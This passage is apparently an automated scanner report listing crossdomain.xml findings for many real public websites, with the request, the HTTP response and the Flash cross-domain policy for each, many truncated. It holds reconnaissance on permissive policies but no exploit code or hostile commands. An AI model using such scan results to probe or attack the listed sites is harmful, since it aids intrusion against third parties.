HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:34:09 GMT Server: Apache/1.3.41 (Unix) PHP/5.2.13 Last-Modified: Mon, 24 Jan 2011 19:32:09 GMT ETag: "138-4d3dd3b9" Accept-Ranges: bytes Content-Length: 312 Connection: close Content-Type: application/xml X-Pad: avoid browser bug Set-Cookie: RNLBSERVERID=ded543; path=/ Cache-control: private <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.videobash.com" /> <allow-access-from domain="*.trafficjunky.net" /> <allow-access-from domain="*.adap.tv" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.walletpop.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.walletpop.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:19:28 GMT Server: Apache/2.2 Accept-Ranges: bytes Content-Length: 318 Keep-Alive: timeout=5, max=999968 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.aol.com" /> <allow-access-from domain="*.blogsmithmedia.com" /> <allow-access-from domain="*.unicast.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.walmart.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.walmart.com |
HTTP/1.0 200 OK Server: Apache/2.2.15 Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT ETag: "bf53-137-46ca84217bc80" Cache-Control: max-age=7200 Expires: Sat, 02 Apr 2011 14:37:43 GMT Content-Type: application/xml Date: Sat, 02 Apr 2011 12:37:43 GMT Content-Length: 311 Connection: close Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc Set-Cookie: SSLB=0; path=/; domain=.walmart.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.walmart.com" /> <allow-access-from domain="*.richfx.com" /> <allow-access-from domain="*.edgesuite.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.warnerbros.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.warnerbros.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:01 GMT Server: Apache X-WBOL-WebServer: www_us Set-cookie: WBWTID=173.193.214.243 Last-Modified: Mon, 06 Jul 2009 20:39:06 GMT ETag: "6174a7-16a-7f4a8e80" Accept-Ranges: bytes Content-Length: 362 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.warnerbros.com" /> <allow-access-from domain="*.telepixtv.net" /> <allow-access-from domain="*.telepixtv.com" /> <allow-access-from domain="*.bunchball.com" /> <allow-access-from domain="*.bunchball.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.washingtonpost |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.washingtonpost.com |
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT Content-Type: application/xml Content-Length: 478 X-Cnection: close Cache-Control: must-revalidate, max-age=4 Date: Sat, 02 Apr 2011 12:43:09 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.washingtonpost.com"/> <allow-access-from domain="admin.brightcove.com"/> <allow-access-from domain="*.newsweek.com"/> <allow-access-from domain="*.digitalink.com"/> <allow-access-from domain="*.slate.com"/> <allow-access-from domain="livingstories.googlelabs ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weather.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.weather.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:37:29 GMT Content-Type: text/xml Accept-Ranges: bytes Server: Apache SVRNAME: web3x03 Vary: Accept-Encoding Content-Length: 2010 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.weather.com" /> <allow-access-from domain="*.epicmashup.com" /> <allow-access-from domain="showcase.weather.com" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.imwx.com" /> <allow-access-from domain="*.rga.com" /> <allow-access-from domain="*.jnj.com" /> <allow-access-from domain="*.zyrtec.com" /> <allow-access-from domain="*.amazonaws.com" /> <allow-access-from domain="*.gigyahosting.com" /> <allow-access-from domain="*.gigyahosting1.com" /> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="www.pointroll.com" /> <allow-access-from domain="data.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="mirror.pointroll.com" /> <allow-access-from domain="adportal.pointroll.com" /> <allow-access-from domain="*.ge.com" /> <allow-access-from domain="widgets.nbcuni.com" /> <allow-access-from domain="*.ivillage.com" /> <allow-access-from domain="devworks.ivillage.com" /> <allow-access-from domain="devi.ivillage.com" /> <allow-access-from domain="i.ivillage.com" /> <allow-access-from domain="www.ivillage.com" /> <allow-access-from domain="msnbcmedia.msn.com" /> <allow-access-from domain="*.tvpdigital.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="apps.eyewonderlabs.com" /> <allow-access-from domain="*.eyewonder.com" /> <allow-access-from domain="fjpecvaa.joyent.us" /> <allow-access-from domain="widget.bravotv.com" /> <allow-access-from domain="*.jwtdev.com" /> <allow-access-from domain="*.jwtweb.com" /> <allow-access-from domain="*.na.jnj.com" /> <allow-access-from domain="*2mdn.net" /> <allow-access-from domain="*.googlesyndication.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.webshots.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.webshots.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:28:05 GMT Server: Resin/3.0.23 ETag: "Hn4QveNaujs" Last-Modified: Thu, 17 Mar 2011 13:19:16 GMT Set-Cookie: AB_ID=2985706610117927138 Set-Cookie: session_source=webs; domain=.webshots.com; path=/ Content-Type: text/xml Content-Length: 419 Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*.webshots.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.webshots.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.imgag.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.weightwatchers |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.weightwatchers.com |
HTTP/1.1 200 OK Cache-Control: max-age=1209600 Content-Length: 285 Content-Type: text/xml Last-Modified: Tue, 22 Dec 2009 11:25:24 GMT Accept-Ranges: bytes ETag: "0ea1c74f982ca1:247" CP: CAO DSP CURa ADMa DEVa TAIa PSAa IVAa CONi OTPa OUR SAMa STP PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:36:38 GMT Connection: close <?xml version="1.0" encoding="iso-8859-1"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.weightwatchers.com" /> <allow-http-reques ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wetpaint.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wetpaint.com |
HTTP/1.1 200 OK Age: 0 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:58:41 GMT Last-Modified: Fri, 14 May 2010 18:42:05 GMT Server: prod7 Vary: Accept-Encoding X-Cache: MISS Content-Length: 247 Connection: Close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cooliris.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.whitehouse.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.whitehouse.gov |
HTTP/1.0 200 OK Last-Modified: Wed, 30 Mar 2011 23:01:41 GMT Content-Type: text/xml Cache-Control: max-age=275 Expires: Sat, 02 Apr 2011 13:54:56 GMT Date: Sat, 02 Apr 2011 13:50:21 GMT Content-Length: 399 Connection: close Server: White House P3P: CP="NON DSP COR ADM DEV IVA OTPi OUR LEG" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="stage-creative.myspacecdn <allow-access-from domain="creative.myspacecdn.com"/> <allow-access-from domain="*.myspacecdn.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wimp.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wimp.com |
HTTP/1.0 200 OK Content-Type: text/xml Accept-Ranges: bytes ETag: "795047349" Last-Modified: Wed, 29 Apr 2009 18:43:54 GMT Content-Length: 154 Connection: close Date: Sat, 02 Apr 2011 13:26:05 GMT Server: lighttpd/1.4.28 <?xml version="1.0"?> <!-- http://www.foo.com <cross-domain-policy> <allow-access-from domain="*.wimp.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wn.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:38:49 GMT Server: Apache/2.2.16 (Debian) Last-Modified: Mon, 22 Jan 2007 20:02:38 GMT ETag: "305856-101-427a68b105380 Accept-Ranges: bytes Content-Length: 257 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.wn.com" /> <allow-access-from domain="*.worldnews.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.womansday.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.womansday.com |
HTTP/1.0 200 OK Last-Modified: Thu, 10 Sep 2009 09:12:36 GMT Accept-Ranges: bytes Content-Length: 224 Content-Type: application/xml Date: Sat, 02 Apr 2011 14:04:47 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="*.hfmus.com" /> <allow-access-from domain="hfm.checkm8.com" /> <allow-access-from domain="*.womansday.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.worldwinner |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.worldwinner.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:53:16 GMT Server: Apache Last-Modified: Mon, 20 Oct 2003 15:12:42 GMT Accept-Ranges: bytes Content-Length: 388 Vary: Accept-Encoding,User P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT" Content-Type: text/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- allows flash player 7 to post within worldwinner [flash solitaire: ...[SNIP]... <allow-access-from domain='*.worldwinner.com' /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wsbtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wsbtv.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (CentOS) X-IBS-CCDS-VERSION: 2.16.16 X-IBS-CCDS-ORIGIN: origin131 Accept-Ranges: bytes Content-Length: 132 Content-Type: text/xml Cache-Control: max-age=60671 Expires: Sun, 03 Apr 2011 06:41:45 GMT Date: Sat, 02 Apr 2011 13:50:34 GMT Connection: close Set-Cookie: alpha=47ce8f18567b00 <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="*.wsbtv.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.wwe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wwe.com |
HTTP/1.0 200 OK Last-Modified: Wed, 23 Mar 2011 21:35:31 GMT ETag: "69991f7-1d5-49f2d23 Server: Apache/2.2.17 X-App: p5tyr2 Content-Type: application/xml X-Varnish: 1285448186 X-CacheTyr-Server: p5tyr2 X-CacheTyr: MISS Content-Length: 469 X-CacheKyte-Server: p5kyte7 X-CacheKyte: HIT X-CacheKyte-Hits: 1 Cache-Control: public, max-age=8077 Date: Sat, 02 Apr 2011 13:39:42 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="localhost" /> <allow-access-from domain="*.wwe.com" /> <allow-access-from domain="*.wrestlemania25.com"/> <allow-access-from domain="*.wwekids.com"/> <allow-access-from domain="wwe.mylaunchpad.com.my"/> <allow-access-from domain="*.brightcove.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.yallwire.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yallwire.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:51 GMT Server: Apache/2.2.16 (Unix) Vary: Accept-Encoding Content-Length: 526 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.blastro.com" /> <allow-access-from domain="*.roxwel.com" /> <allow-access-from domain="*.yallwire.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.adxcel.com"/> <allow-access-from domain="*.dev.adxcel.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.yellowpages |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yellowpages.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:07 GMT Status: 200 OK Connection: close Server: nginx Content-Type: text/xml Content-Length: 356 Last-Modified: Fri, 01 Apr 2011 18:25:22 GMT Expires: Sat, 02 Apr 2011 12:43:06 GMT Cache-Control: no-cache Accept-Ranges: bytes Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.yellowpages.com" /> <allow-access-from domain="yellowpages.com" /> <allow-access-from domain="*.ypcdn.com" /> <allow-access-from domain="localhost" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.yontoo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yontoo.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 18:22:44 GMT Accept-Ranges: bytes ETag: "70f545a1d0efcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET 2x8 Date: Sat, 02 Apr 2011 13:33:19 GMT Connection: close Content-Length: 274 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.pagerage.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zap2it.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zap2it.com |
HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Length: 265 Content-Type: text/xml Last-Modified: Fri, 18 Jun 2010 02:41:30 GMT ETag: "109-4c1adcda" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 13:37:20 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zappos.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zappos.com |
HTTP/1.0 200 OK Server: nginx/0.9.4 Content-Type: application/xml Last-Modified: Thu, 31 Mar 2011 18:07:44 GMT Content-Length: 236 X-Core-Value: 6. Build Open and Honest Relationships With Communication X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com X-UUID: 6ec4abb8-5bda-11e0-9784 Date: Sat, 02 Apr 2011 13:31:01 GMT Connection: close <?xml version="1.0"?><cross ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zazzle.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zazzle.com |
HTTP/1.1 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Mon, 08 Nov 2010 08:13:34 GMT Accept-Ranges: bytes ETag: "328bbdd61c7fcb1:0" Server: Microsoft-IIS/7.5 Date: Sat, 02 Apr 2011 13:35:14 GMT Connection: keep-alive Content-Length: 894 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.zazzle.com" /> <allow-access-from domain="*.zazzle.co.uk" /> <allow-access-from domain="*.zazzle.com.au" /> <allow-access-from domain="*.zazzle.ca" /> <allow-access-from domain="*.zazzle.co.nz" /> <allow-access-from domain="*.zazzle.de" /> <allow-access-from domain="*.zazzle.pt" /> <allow-access-from domain="*.zazzle.com.br" /> <allow-access-from domain="*.zazzle.es" /> <allow-access-from domain="*.zazzle.fr" /> <allow-access-from domain="*.zazzle.co.jp" /> <allow-access-from domain="*.zcache.com" /> <allow-access-from domain="*.myspace.com" /> <allow-access-from domain="*.myspacecdn.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zmags.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zmags.com |
HTTP/1.0 200 OK Last-Modified: Wed, 03 Nov 2010 14:17:20 GMT ETag: "45241c8-143-49426b3 Server: Apache Accept-Ranges: bytes Content-Length: 323 Content-Type: text/xml Cache-Control: max-age=1044180 Expires: Thu, 14 Apr 2011 16:06:24 GMT Date: Sat, 02 Apr 2011 14:03:24 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="*.zmags.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zshare.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zshare.net |
HTTP/1.0 200 OK Content-Type: text/xml ETag: "161515371" Accept-Ranges: bytes Last-Modified: Thu, 12 Aug 2010 12:10:48 GMT Content-Length: 278 Connection: close Date: Sat, 02 Apr 2011 14:00:58 GMT Server: lighttpd/1.5.0 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="*.zshare.net"/> <allow-http-req ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zwinky.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zwinky.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:45:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28 Last-Modified: Fri, 03 Dec 2010 20:55:45 GMT ETag: "1a9777a-1b5-49687c3 Accept-Ranges: bytes Content-Length: 437 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.myfuncards.com" /> <allow-access-from domain="*.webfetti.com" /> <allow-access-from domain="*.zwinky.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.zynga.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zynga.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:44:11 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 17 Sep 2010 16:52:50 GMT ETag: "18008ac-130-4907764 Accept-Ranges: bytes Content-Length: 304 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.zynga.com" /> <allow-access-from domain="*.jobvite.com" /> <allow-access-from domain="*.fishville.net" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.active.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.active.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Fri, 29 Jan 2010 22:51:52 GMT ETag: "aeeb9a-d9-7b40b200" Accept-Ranges: bytes Content-Length: 217 Content-Type: application/xml Expires: Sat, 02 Apr 2011 13:45:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:45:18 GMT Connection: close Set-Cookie: BIGipServeractive.com <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="nike-dev2.ny.rga.com"/> <allow-access-from domain="env1-plus.nike.com"/> <allow-access-from domain="nikeplus.nike.com"/> </cro ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.allmenus.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.allmenus.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:09 GMT Server: Apache Last-Modified: Thu, 11 Feb 2010 15:23:46 GMT ETag: "92803e-2a7-47f54bca8c480 Accept-Ranges: bytes Content-Length: 679 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="www.campusfood.com" /> <allo ...[SNIP]... <allow-access-from domain="allmenus.com" /> <allow-access-from domain="campusfood.com" /> <allow-access-from domain="i-allmenus.com" /> <allow-access-from domain="intranet.campusfood.com" /> <allow-access-from domain="post-gazette.com" /> <allow-access-from domain="www.post-gazette.com" /> <allow-access-from domain="restaurants.post-gazette <allow-access-from domain="restaurants.philly.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.autotrader.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.autotrader.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:25:48 GMT Server: Apache Set-Cookie: v1st=29C45FC3ABC999DF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com Set-Cookie: ATC_ID=173.193.214.243 Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT Accept-Ranges: bytes Content-Length: 221 Vary: Accept-Encoding P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/xml Set-Cookie: BIGipServerAT-Production <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="ads.autotrader.com" /> </ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.autotrade |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.autotraderstatic.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT Content-Type: text/xml Date: Sat, 02 Apr 2011 13:31:40 GMT Content-Length: 221 Connection: close Set-Cookie: M7F1=CT; expires=Sat, 30-Apr-2011 13:31:40 GMT; path=/; domain=autotraderstatic P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELi OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV;" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="ads.autotrader.com" /> </ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.blackplanet |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.blackplanet.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:54:02 GMT Server: Apache X-Powered-By: PHP/5.2.4 Content-Length: 257 Keep-Alive: timeout=120, max=470 Connection: Keep-Alive Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="st.bpcdn.us" /> <allow-access-from domain="pi.bpcdn.us" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.boston.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.boston.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:42:56 GMT Server: Apache/2.2.13 (Unix) modpath/0.4 Last-Modified: Tue, 19 Oct 2010 20:25:47 GMT Accept-Ranges: bytes Content-Length: 1310 Served-By: garrick Keep-Alive: timeout=30 Connection: close Content-Type: application/xml Set-Cookie: bcpage=0;expires=Sun, 06-Mar-2016 13:42:56 GMT;path=/;domain=boston <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="admin.brightcove.com" /> <allow-access-from domain="boston.com" /> <allow-access-from domain="cache.boston.com" /> <allow-access-from domain="cachelection.boston.com" /> <allow-access-from domain="dev.xif.com" /> <allow-access-from domain="explorenewengland.com" /> <allow-access-from domain="graphics.boston.com" /> <allow-access-from domain="necn.dsys.worldnow.com" /> <allow-access-from domain="necn.dua.worldnow.com" /> <allow-access-from domain="oastest.boston.com" /> <allow-access-from domain="re.boston.com" /> <allow-access-from domain="rmedia.boston.com" /> <allow-access-from domain="video.boston.com" /> <allow-access-from domain="video.necn.com" /> <allow-access-from domain="video.nesn.com" /> <allow-access-from domain="workbench.boston.com" /> <allow-access-from domain="realestate.boston.com" /> ...[SNIP]... <allow-access-from domain="www.explorenewengland.com" /> <allow-access-from domain="www.private.boston.com" /> <allow-access-from domain="objects.tremormedia.com" /> <allow-access-from domain="redir.adap.tv" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.christianbook |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.christianbook.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:12 GMT Server: Apache/1.3.42 (Unix) mod_perl/1.31 Last-Modified: Fri, 26 Oct 2007 15:22:06 GMT ETag: "b-146-4722061e" Accept-Ranges: bytes Content-Length: 326 Keep-Alive: timeout=120, max=454 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="christianbook.com" /> <allow-a ...[SNIP]... <allow-access-from domain="graphics.christianbook ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.chuckecheese |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.chuckecheese.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:05 GMT Server: Apache/2.0.52 (Red Hat) Last-Modified: Wed, 30 Jun 2010 20:09:45 GMT ETag: "578759-140-ef5b7440" Accept-Ranges: bytes Content-Length: 320 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="dev.chuckecheese.com" /> <allow-access-from domain="chuckecheese.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cincinnati.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.cincinnati.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:50:52 GMT Server: Apache Last-Modified: Fri, 17 Jul 2009 06:42:13 GMT ETag: "1081e3f-33f-46ee116 Accept-Ranges: bytes Content-Length: 831 Wx: D=1079 t=1301752252167800 w=3 Connection: close Content-Type: text/xml <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="media.pointroll.com" /> <allow-access-from domain="www.pointroll.com" /> <allow-access-from domain="submit.pointroll.com" /> <allow-access-from domain="data.pointroll.com" /> <allow-access-from domain="speed.pointroll.com" /> <allow-access-from domain="mirror.pointroll.com" /> <allow-access-from domain="mx.pointroll.com" /> <allow-access-from domain="geo.pointroll.com" /> <allow-access-from domain="ll.pointroll.com" /> <allow-access-from domain="clk.pointroll.com" /> <allow-access-from domain="clients.pointroll.com" /> <allow-access-from domain="fdaf.pointroll.com" /> <allow-access-from domain="demo.pointroll.net" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.continental |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.continental.com |
